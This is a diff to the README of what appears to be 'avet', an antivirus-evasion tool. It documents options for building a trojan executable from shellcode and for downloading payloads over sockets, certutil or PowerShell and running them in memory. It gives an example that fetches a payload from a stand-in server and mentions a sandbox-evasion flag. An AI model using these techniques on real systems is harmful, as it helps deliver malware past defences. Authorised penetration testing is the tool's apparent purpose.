govolution/avet/README.md

-   when called with -E call with mytrojan.exe shellcode.txt -f compile shellcode into .exe, needs filename of shellcode file -u load and exec shellcode from url using internet explorer (url is compiled into executable) -d download a raw shellcode via http in memory and exec (no overhead, use socket) usage example: pwn.exe http://yourserver/yourpayload.bin -E use avets ASCII encryption, often do not has to be used Can be used with -l
+   when called with -E call with mytrojan.exe shellcode.txt -f compile shellcode into .exe, needs filename of shellcode file -u load and exec shellcode from url using internet explorer (url is compiled into executable) -d download the shellcode file using different techniques -d sock -> for downloading a raw shellcode via http in memory and exec (no overhead, use socket)
+      usage example: pwn.exe http://yourserver/yourpayload.bin
+   -d certutil -> use certutil.exe for downloading the file -d powershell -> use powershell for downloading the file
+      usage of -d certutil/powershell in combination with -f for executing the raw shellcode after downloading -E use avets ASCII encryption, often do not has to be used Can be used with -l
 -F use fopen sandbox evasion